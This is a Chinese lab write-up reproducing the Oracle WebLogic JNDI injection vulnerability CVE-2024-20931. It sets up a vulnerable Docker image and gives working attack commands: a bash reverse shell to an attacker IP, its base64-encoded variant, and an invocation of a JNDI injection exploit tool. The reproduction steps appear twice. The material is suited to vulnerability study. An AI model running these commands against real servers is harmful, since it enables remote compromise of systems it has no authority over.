Oracle WebLogic Server JNDI注入漏洞(CVE-2024-20931)复现
先从镜像站拉取Oracle WebLogic Server JNDI注入漏洞(CVE-2024-20931)
然后在docker中启动这个镜像
即可在网页中访问,搭建网站成功
使用利用工具来进行验证是否存在漏洞
获取DNS查看是否有回显
有回显漏洞存在
创造反弹shell,先查看攻击机的ip
进行反弹shell编码
使用nc开启监听端口
接下来,运行JNDI注入工具:
再在工具中输入LDAP地址
查看nc是否回去shell
获取成功复现成功
先从镜像站拉取Oracle WebLogic Server JNDI注入漏洞(CVE-2024-20931)
docker pull ismaleiva90/weblogic12
然后在docker中启动这个镜像
docker run -dit -p 7001:7001 -p 7002:7002 --restart=always ismaleiva90/weblogic12:latest
即可在网页中访问,搭建网站成功
使用利用工具来进行验证是否存在漏洞
获取DNS查看是否有回显
有回显漏洞存在
创造反弹shell,先查看攻击机的ip
bash -i >& /dev/tcp/192.168.162.1/5557 0>&1
进行反弹shell编码
bash -c {echo,CmJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xNjIuMS81NTU3IDA+JjE=}|{base64,-d}|{bash,-i}
使用nc开启监听端口
接下来,运行JNDI注入工具:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "编码后的反弹Shell命令" -A "启动恶意服务的服务器IP"
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· winform 绘制太阳,地球,月球 运作规律
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)